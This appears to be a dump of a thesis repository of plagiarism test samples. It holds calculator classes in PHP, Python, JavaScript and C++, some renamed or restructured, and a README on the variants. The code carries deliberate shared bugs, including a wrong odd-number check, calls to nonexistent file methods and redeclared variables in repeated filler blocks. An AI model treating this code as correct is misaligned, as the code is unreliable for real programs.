$number_1) {\n\t\t\t$this->f_print($number_1 . \" is smaller than \" . $number_2);\n\t\t} else {\n\t\t\t$this->f_print($number_1 . \" is the same as \" . $number_2);\n\t\t}\n\t}\n\t\n\t// Adds $results to m_history\n\tpublic function load_history_from_file($file_name) {\n if($file_name !== '')\n try {\n\t\t\t$l_file = fopen($file_name, \"r\");\n $read_line = \"\";\n while (($readLine = fgets($l_file)) !== false) {\n $this->add_to_history($read_line);\n }\n fclose($l_file);\n $this->f_print(\"m_history form file was loaded!\");\n\t\t} catch (Exception $e) {\n\t\t\t$this->f_print(\"File could not be loaded! Because:\" . $e);\n\t\t}\n\t}\n\t\n\t// Returns if l_number is odd\n\tpublic function is_odd( $l_number) {\n\t\t$bool_is_odd = ($l_number/2) != 0;\n\t\tswitch ($bool_is_odd) {\n\t\t\tcase true:\n\t\t\t\t$this->f_print($l_number . \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\t$this->f_print($l_number . \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5646234750747681,
"alphanum_fraction": 0.575131356716156,
"avg_line_length": 32.988094329833984,
"blob_id": "fa5a1fcbfa643ed770bca1a1b08253097fac3ceb",
"content_id": "e62841f33e466038b95792fc2d17dd98b01f4177",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2855,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 84,
"path": "/python/Calculator.2.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Calculator:\n # m_history of results\n m_history = []\n\n # Constructor for loading results from file\n def __init__(self, file_name):\n self.load_history_from_file(file_name)\n self.f_print(\"Calculator was created\")\n\n # Prints text with current date\n def f_print(self, text):\n date = datetime.datetime.now()\n print(\"# \" + str(date) + \" # \" + text)\n\n # Add two numbers\n def f_addition(self, number_1, number_2):\n l_result = number_1 + number_2\n self.f_print('Result of f_addition is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Substracts two numbers\n def f_substraction(self, number_1, number_2):\n l_result = number_1 - number_2\n self.f_print('Result of f_substraction is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Multiplies two numbers\n def f_multiplication(self, number_1, number_2):\n l_result = number_1 * number_2\n self.f_print('Result of f_multiplication is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Divides two numbers\n def f_division(self, number_1, number_2):\n l_result = number_1 / number_2\n self.f_print('Result of f_division is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Adds l_result to m_history array\n def add_to_history(self, l_item):\n self.m_history.append(l_item)\n\n # f_print the whole m_history\n def print_history(self):\n for l_result in self.m_history:\n self.f_print(str(l_result))\n\n # Compare two numbers\n def compare_numbers(self, number_1, number_2):\n if number_1 > number_2:\n self.f_print(str(number_1) + \" is bigger than \" + str(number_2))\n elif number_2 > number_1:\n self.f_print(str(number_1) + \" is smaller than \" + str(number_2))\n else:\n self.f_print(str(number_1) + \" is the same as \" + str(number_2))\n\n # Adds results to m_history\n def load_history_from_file(self, file_name):\n try:\n l_file = open(file_name)\n read_line = l_file.readline()\n while read_line != None:\n self.add_to_history(read_line)\n read_line = l_file.read_line()\n file.close()\n self.f_print(\"m_history from file was loaded!\")\n except Exception:\n self.f_print(\"File could not be loaded! Because:\" + str(Exception))\n\n # Returns if l_number is odd\n def is_odd(self, l_number):\n bool_is_odd = l_number / 2 != 0\n if bool_is_odd:\n self.f_print(str(l_number) + \" is odd!\")\n return True\n if not bool_is_odd:\n self.f_print(str(l_number) + \" is not odd!\")\n return False\n"
},
{
"alpha_fraction": 0.6296456456184387,
"alphanum_fraction": 0.6434745192527771,
"avg_line_length": 21.69607925415039,
"blob_id": "6e84451ba74a626cce286669ceec60f688136a46",
"content_id": "fadbd0d4e3f4f3f564cd53f16d0208798ba35bc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2314,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 102,
"path": "/javascript/Calculator.js",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "// Calculator class\n\nclass Calculator {\n\t// History of results\n history = [];\n\t\n\t// Constructor for loading results from file\n\tconstructor(fileName) {\n\t\tthis.loadHistoryFromFile(fileName);\n\t\tthis.print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tprint(text) {\n\t\tdate = new Date();\n\t console.log(\"# \" + date.toString() + \" # \" + text );\n\t}\n\t\n\t// Adds two numbers\n\taddition(number1, number2) {\n\t\tconst result = number1 + number2;\n\t\tthis.print(\"Result od addition is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t// Subtracts two numbers\n\tsubstraction(number1, number2) {\n\t\tconst result = number1 - number2;\n\t\tthis.print(\"Result od substraction is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tmultiplication(number1, number2) {\n\t\tconst result = number1 * number2;\n\t\tthis.print(\"Result od multiplication is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t// Divides two numbers\n\tdivision(number1, number2) {\n\t\tconst result = number1 / number2;\n\t\tthis.print(\"Result od division is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t// Adds result to history array\n\taddToHistory(item) {\n\t\tthis.history.append(item);\n\t}\n\t\n\t// Print the whole history\n\tprintHistory() {\n\t\tthis.history.forEach(function(result){\n\t\t\tthis.print(result);\n\t\t})\n\t}\n\t\n\t// Compare two numbers\n\tcompareNumbers(number1, number2) {\n\t\tif (number1 > number2) {\n\t\t\tthis.print(number1 + \" is bigger than \" + number2);\n\t\t} else if (number2 > number1) {\n\t\t\tthis.print(number1 + \" is smaller than \" + number2);\n\t\t} else {\n\t\t\tthis.print(number1 + \" is the same as \" + number2);\n\t\t}\n\t}\n\t\n\t// Adds results to history\n\tloadHistoryFromFile(fileName) {\n\t\ttry {\n\t\t\tfileName = fileName.split('\\n');\n\t\t\tconst readLine = 0;\n while (readLine < fileName.length) {\n\t\t\t\tthis.addToHistory(fileName[readLine]);\n\t\t\t\treadLine += 1;\n }\n this.print(\"History from file was loaded!\");\n\t\t} catch (e) {\n\t\t\tthis.print(\"File could not be loaded! Because:\" + e);\n\t\t}\n\t}\n\t\n\t// Returns if number is odd\n\tisOdd(number) {\n\t\tboolIsOdd = (number%2) != 0;\n\t\tswitch (boolIsOdd) {\n\t\t\tcase true:\n\t\t\t\tthis.print(number + \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\tthis.print(number + \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5727376937866211,
"alphanum_fraction": 0.5841924548149109,
"avg_line_length": 30.178571701049805,
"blob_id": "3107f64648131ed72b2af8bc9942e5a473866841",
"content_id": "c3952b34fd614ed1ad4e6923a70bf58cd34d51da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2619,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 84,
"path": "/python/Calculator.1.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Computer:\n # records of results\n records = []\n\n # Constructor for loading results from file\n def __init__(self, path):\n self.pushResultsData(path)\n self.log(\"Computer was created\")\n\n # Prints content with current time\n def log(self, content):\n time = datetime.datetime.now()\n print(\"# \" + str(time) + \" # \" + content)\n\n # Add two numbers\n def plus(self, numeral1, numeral2):\n outcome = numeral1 + numeral2\n self.log('outcome of plus is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Substracts two numbers\n def minus(self, numeral1, numeral2):\n outcome = numeral1 - numeral2\n self.log('outcome of minus is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Multiplies two numbers\n def multiply(self, numeral1, numeral2):\n outcome = numeral1 * numeral2\n self.log('outcome of multiply is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Divides two numbers\n def divide(self, numeral1, numeral2):\n outcome = numeral1 / numeral2\n self.log('outcome of divide is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Adds outcome to records array\n def pushResult(self, element):\n self.records.append(element)\n\n # log the whole records\n def logResults(self):\n for outcome in self.records:\n self.log(str(outcome))\n\n # Compare two numbers\n def comparisonNumerals(self, numeral1, numeral2):\n if numeral1 > numeral2:\n self.log(str(numeral1) + \" is bigger than \" + str(numeral2))\n elif numeral2 > numeral1:\n self.log(str(numeral1) + \" is smaller than \" + str(numeral2))\n else:\n self.log(str(numeral1) + \" is the same as \" + str(numeral2))\n\n # Adds results to records\n def pushResultsData(self, path):\n try:\n data = open(path)\n row = data.row()\n while row != None:\n self.pushResult(row)\n row = data.row()\n data.close()\n self.log(\"records from file was loaded!\")\n except Exception:\n self.log(\"File could not be loaded! Because:\" + str(Exception))\n\n # Returns if numeral is odd\n def uneven(self, numeral):\n booleanUneven = numeral / 2 != 0\n if booleanUneven:\n self.log(str(numeral) + \" is odd!\")\n return True\n if not booleanUneven:\n self.log(str(numeral) + \" is not odd!\")\n return False\n"
},
{
"alpha_fraction": 0.5517436861991882,
"alphanum_fraction": 0.5602495074272156,
"avg_line_length": 29.947368621826172,
"blob_id": "ba6d2f7717a15ff8af6efd75cff53f661bd3cba3",
"content_id": "b6cf2fe9947a7f68097a3ece04479917851b2612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3527,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 114,
"path": "/c++/Calculator.2.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Calculator class\nclass Calculator {\n // m_history of results\nprivate: vector<float> m_history;\n\n // Constructor for loading results from file\n public: Calculator(string file_name) {\n load_history_from_file(file_name);\n f_print(\"Calculator was created\");\n }\n \n Calculator() {\n f_print(\"Calculator was created\");\n }\n\n // Prints text with current date\n public: void f_print(string text) {\n std::time_t date = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&date) << \" # \" << text;\n }\n\n // Adds two numbers\n public: float f_addition(float number_1, float number_2) {\n float l_result = number_1 + number_2;\n f_print(\"Result od f_addition is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n // Subtracts two numbers\n public: float f_substraction(float number_1, float number_2) {\n float l_result = number_1 - number_2;\n f_print(\"Result od f_substraction is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n\n // Multiplies two numbers\n public: float f_multiplication(float number_1, float number_2) {\n float l_result = number_1 * number_2;\n f_print(\"Result od f_multiplication is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n // Divides two numbers\n public: float f_division(float number_1, float number_2) {\n float l_result = number_1 / number_2;\n f_print(\"Result od f_division is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n // Adds l_result to m_history array\n private: void add_to_history(float l_item) {\n m_history.push_back(l_item);\n }\n\n // f_print the whole m_history\n public: void print_history() {\n for (float l_result: m_history) {\n f_print(to_string(l_result));\n }\n }\n\n // Compare two numbers\n public: void compare_numbers(float number_1, float number_2) {\n if (number_1 > number_2) {\n f_print(to_string(number_1) + \" is bigger than \" + to_string(number_2));\n } else if (number_2 > number_1) {\n f_print(to_string(number_1) + \" is smaller than \" + to_string(number_2));\n } else {\n f_print(to_string(number_1) + \" is the same as \" + to_string(number_2));\n }\n }\n\n // Adds results to m_history\n public: void load_history_from_file(string file_name) {\n try {\n std::ifstream file(file_name);\n string read_line = \"\";\n while (getline(file, read_line)) {\n add_to_history(stof(read_line));\n }\n file.close();\n f_print(\"m_history form file was loaded!\");\n } catch (const std::exception& e) {\n f_print(\"File could not be loaded! Because:\" + std::string(e.what()));\n }\n }\n\n // Returns if l_number is odd\n public: bool is_odd(float l_number) {\n bool bool_is_odd = (l_number/2) != 0;\n switch (bool_is_odd) {\n case true:\n f_print(to_string(l_number) + \" is odd!\");\n return true;\n case false:\n f_print(to_string(l_number) + \" is not odd!\");\n return false;\n }\n }\n};"
},
{
"alpha_fraction": 0.558962881565094,
"alphanum_fraction": 0.5609573721885681,
"avg_line_length": 37.57692337036133,
"blob_id": "533377f5286c177116212b2991ee540bf6ca7ecc",
"content_id": "489b452cf7909baee936c3a8fd9310acc6706a61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4011,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 104,
"path": "/c++/Calculator.4.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Calculator class\nclass Calculator {\n // History of results\nprivate: vector<float> history;\n\n // Constructor for loading results from file\n public: Calculator(string fileName) {\n loadHistoryFromFile(fileName);\n print(\"Calculator was created\");\n }\n \n Calculator() {\n print(\"Calculator was created\");\n }\n\n // Prints text with current date\n public: void print(string text) {\n std::time_t date = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&date) << \" # \" << text;\n }\n\n // Adds two numbers\n public: float addition(float number1, float number2) {\n float result = number1 + number2;\n print(\"Result od addition is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Divides two numbers\n public: float division(float number1, float number2) {\n float result = number1 / number2;\n print(\"Result od division is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Adds result to history array\n private: void addToHistory(float item) {\n history.push_back(item);\n }\n\n // Adds results to history\n public: void loadHistoryFromFile(string fileName) {\n try {\n std::ifstream file(fileName);\n string readLine = \"\";\n while (getline(file, readLine)) {\n addToHistory(stof(readLine));\n }\n file.close();\n print(\"History form file was loaded!\");\n } catch (const std::exception& e) {\n print(\"File could not be loaded! Because:\" + std::string(e.what()));\n }\n }\n\n public: void something(){\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n }\n};"
},
{
"alpha_fraction": 0.7657266855239868,
"alphanum_fraction": 0.7819956541061401,
"avg_line_length": 37.41666793823242,
"blob_id": "3de3ea80f52bf27b7dd1af3ea38e69064c336c33",
"content_id": "2ad2d578e3b05fb2ba0f6d790c3ff923d4307793",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 188,
"num_lines": 24,
"path": "/README.md",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "# plagiarism-source-code-examples\nSource code examples of plagiarism for my diploma thesis\n\n5 Most used programming languages on Github (according to [this list](https://www.businessinsider.com/the-10-most-popular-programming-languages-according-to-github-2018-10#7-typescript-4))\n- Javascript\n- Java\n- Python\n- PHP\n- C++\n\nIn variants:\n- Classic\n- .1. Different names\n- .2. Different naming systems\n- .3. Restructured\n- .4. Half-different (http://www.rosettacode.org/wiki/String_prepend, php: http://www.rosettacode.org/wiki/String_concatenation#PHP)\n\nEvery language has a different file, which solves different problem: http://www.rosettacode.org/wiki/Forest_fire\n\n**Description**\n\nSimple calculator class representing basic elements of source code. These examples are not the best way how to create such class!\n\nThey should mimic plagiarism accross different languages: same function, same structure, same errors, etc.\n"
},
{
"alpha_fraction": 0.6075441241264343,
"alphanum_fraction": 0.6203852295875549,
"avg_line_length": 23.441177368164062,
"blob_id": "b250ec45abcdeaa13e28fc841130f2253756860b",
"content_id": "c1ef9d95d47ecb0b3b69f1d26745b9dcfdfd671d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2492,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 102,
"path": "/javascript/Calculator.2.js",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "// Calculator class\n\nclass Calculator {\n\t// m_history of results\n m_history = [];\n\t\n\t// Constructor for loading results from file\n\tconstructor(file_name) {\n\t\tthis.load_history_from_file(file_name);\n\t\tthis.f_print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tf_print(text) {\n\t\tdate = new Date();\n\t console.log(\"# \" + date.toString() + \" # \" + text );\n\t}\n\t\n\t// Adds two numbers\n\tf_addition(number_1, number_2) {\n\t\tconst l_result = number_1 + number_2;\n\t\tthis.f_print(\"Result od f_addition is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t// Subtracts two numbers\n\tf_substraction(number_1, number_2) {\n\t\tconst l_result = number_1 - number_2;\n\t\tthis.f_print(\"Result od f_substraction is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tf_multiplication(number_1, number_2) {\n\t\tconst l_result = number_1 * number_2;\n\t\tthis.f_print(\"Result od f_multiplication is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t// Divides two numbers\n\tf_division(number_1, number_2) {\n\t\tconst l_result = number_1 / number_2;\n\t\tthis.f_print(\"Result od f_division is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t// Adds l_result to m_history array\n\tadd_to_history(l_item) {\n\t\tthis.m_history.append(l_item);\n\t}\n\t\n\t// f_print the whole m_history\n\tprint_history() {\n\t\tthis.m_history.forEach(function(l_result){\n\t\t\tthis.f_print(l_result);\n\t\t})\n\t}\n\t\n\t// Compare two numbers\n\tcompare_numbers(number_1, number_2) {\n\t\tif (number_1 > number_2) {\n\t\t\tthis.f_print(number_1 + \" is bigger than \" + number_2);\n\t\t} else if (number_2 > number_1) {\n\t\t\tthis.f_print(number_1 + \" is smaller than \" + number_2);\n\t\t} else {\n\t\t\tthis.f_print(number_1 + \" is the same as \" + number_2);\n\t\t}\n\t}\n\t\n\t// Adds results to m_history\n\tload_history_from_file(file_name) {\n\t\ttry {\n\t\t\tfile_name = file_name.split('\\n');\n\t\t\tconst read_line = 0;\n while (read_line < file_name.length) {\n\t\t\t\tthis.add_to_history(file_name[read_line]);\n\t\t\t\tread_line += 1;\n }\n this.f_print(\"m_history from file was loaded!\");\n\t\t} catch (e) {\n\t\t\tthis.f_print(\"File could not be loaded! Because:\" + e);\n\t\t}\n\t}\n\t\n\t// Returns if l_number is odd\n\tis_odd(l_number) {\n\t\tbool_is_odd = (l_number%2) != 0;\n\t\tswitch (bool_is_odd) {\n\t\t\tcase true:\n\t\t\t\tthis.f_print(l_number + \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\tthis.f_print(l_number + \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5159597992897034,
"alphanum_fraction": 0.527328372001648,
"avg_line_length": 23.869565963745117,
"blob_id": "f9a6c912911b900fc9c5668de100e8d559167ef4",
"content_id": "c2587cd8b71a43b6af561ad4e20cea0c56fa1489",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2287,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 92,
"path": "/php/Calculator.4.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Calculator {\n\t// History of $results\n\tprivate $history = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($fileName = '') {\n\t\t$this->loadHistoryFromFile($fileName);\n\t\t$this->print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tpublic function print($text) {\n\t\t$date = date('m/d/Y h:i:s a', time());\n\t echo \"# \" . $date . \" # \" . $text;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function addition($number1, $number2) {\n\t\t$result = $number1 + $number2;\n\t\t$this->print(\"Result od addition is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function division( $number1, $number2) {\n\t\t$result = $number1 / $number2;\n\t\t$this->print(\"Result od division is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Adds $result to history array\n\tprivate function addToHistory($item) {\n array_push($this->history, $item);\n\t}\n\t\t\n\t// Adds $results to history\n\tpublic function loadHistoryFromFile($fileName) {\n if($fileName !== '')\n try {\n\t\t\t$file = fopen($fileName, \"r\");\n $readLine = \"\";\n while (($readLine = fgets($file)) !== false) {\n $this->addToHistory($readLine);\n }\n fclose($file);\n $this->print(\"History form file was loaded!\");\n\t\t} catch (Exception $e) {\n\t\t\t$this->print(\"File could not be loaded! Because:\" . $e);\n\t\t}\n\t}\n\n\tpublic function voidsomething() {\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t}\n}"
},
{
"alpha_fraction": 0.6211317181587219,
"alphanum_fraction": 0.6352785229682922,
"avg_line_length": 21.1862735748291,
"blob_id": "705085e32bf12ace3d711c8a81908c878d2b4439",
"content_id": "f03e8163e29602702aeb6526982b4f55cca5b1c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2262,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 102,
"path": "/javascript/Calculator.1.js",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "// Computer class\n\nclass Computer {\n\t// records of results\n records = [];\n\t\n\t// Constructor for loading results from file\n\tconstructor(path) {\n\t\tthis.pushResultsData(path);\n\t\tthis.log(\"Computer was created\");\n\t}\n\t\n\t// Prints content with current time\n\tlog(content) {\n\t\ttime = new time();\n\t console.log(\"# \" + time.toString() + \" # \" + content );\n\t}\n\t\n\t// Adds two numbers\n\tplus(numeral1, numeral2) {\n\t\tconst outcome = numeral1 + numeral2;\n\t\tthis.log(\"outcome od plus is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t// Subtracts two numbers\n\tminus(numeral1, numeral2) {\n\t\tconst outcome = numeral1 - numeral2;\n\t\tthis.log(\"outcome od minus is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tmultiply(numeral1, numeral2) {\n\t\tconst outcome = numeral1 * numeral2;\n\t\tthis.log(\"outcome od multiply is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t// Divides two numbers\n\tdivide(numeral1, numeral2) {\n\t\tconst outcome = numeral1 / numeral2;\n\t\tthis.log(\"outcome od divide is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t// Adds outcome to records array\n\tpushResult(element) {\n\t\tthis.records.append(element);\n\t}\n\t\n\t// log the whole records\n\tlogResults() {\n\t\tthis.records.forEach(function(outcome){\n\t\t\tthis.log(outcome);\n\t\t})\n\t}\n\t\n\t// Compare two numbers\n\tcomparisonNumerals(numeral1, numeral2) {\n\t\tif (numeral1 > numeral2) {\n\t\t\tthis.log(numeral1 + \" is bigger than \" + numeral2);\n\t\t} else if (numeral2 > numeral1) {\n\t\t\tthis.log(numeral1 + \" is smaller than \" + numeral2);\n\t\t} else {\n\t\t\tthis.log(numeral1 + \" is the same as \" + numeral2);\n\t\t}\n\t}\n\t\n\t// Adds results to records\n\tpushResultsData(path) {\n\t\ttry {\n\t\t\tdata = path.split('\\n');\n\t\t\tconst row = 0;\n while (row < data.length) {\n\t\t\t\tthis.pushResult(data[row]);\n\t\t\t\trow += 1;\n }\n this.log(\"records from file was loaded!\");\n\t\t} catch (error) {\n\t\t\tthis.log(\"File could not be loaded! Because:\" + error);\n\t\t}\n\t}\n\t\n\t// Returns if numeral is odd\n\tuneven(numeral) {\n\t\tbooleanUneven = (numeral%2) != 0;\n\t\tswitch (booleanUneven) {\n\t\t\tcase true:\n\t\t\t\tthis.log(numeral + \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\tthis.log(numeral + \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5910652875900269,
"alphanum_fraction": 0.6025200486183167,
"avg_line_length": 24.6862735748291,
"blob_id": "ab439b2113d2749ed620e2b0f73552770bcaea2e",
"content_id": "3b56dfc46c2b0a0802b399d805e7aa8e0f1d74a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2619,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 102,
"path": "/php/Calculator.1.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Computer {\n\t// records of $results\n\tprivate $records = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($path = '') {\n\t\t$this->pushResultsData($path);\n\t\t$this->log(\"Computer was created\");\n\t}\n\t\n\t// Prints content with current time\n\tpublic function log($content) {\n\t\t$time = time('m/d/Y h:i:s a', time());\n\t echo \"# \" . $time . \" # \" . $content;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function plus($numeral1, $numeral2) {\n\t\t$outcome = $numeral1 + $numeral2;\n\t\t$this->log(\"outcome od plus is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t// Subtracts two numbers\n\tpublic function minus( $numeral1, $numeral2) {\n\t\t$outcome = $numeral1 - $numeral2;\n\t\t$this->log(\"outcome od minus is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tpublic function multiply( $numeral1, $numeral2) {\n\t\t$outcome = $numeral1 * $numeral2;\n\t\t$this->log(\"outcome od multiply is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function divide( $numeral1, $numeral2) {\n\t\t$outcome = $numeral1 / $numeral2;\n\t\t$this->log(\"outcome od divide is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t// Adds $outcome to records array\n\tprivate function pushResult($element) {\n array_push($this->records, $element);\n\t}\n\t\n\t// log the whole records\n\tpublic function logResults() {\n\t\tforeach ( $this->records as 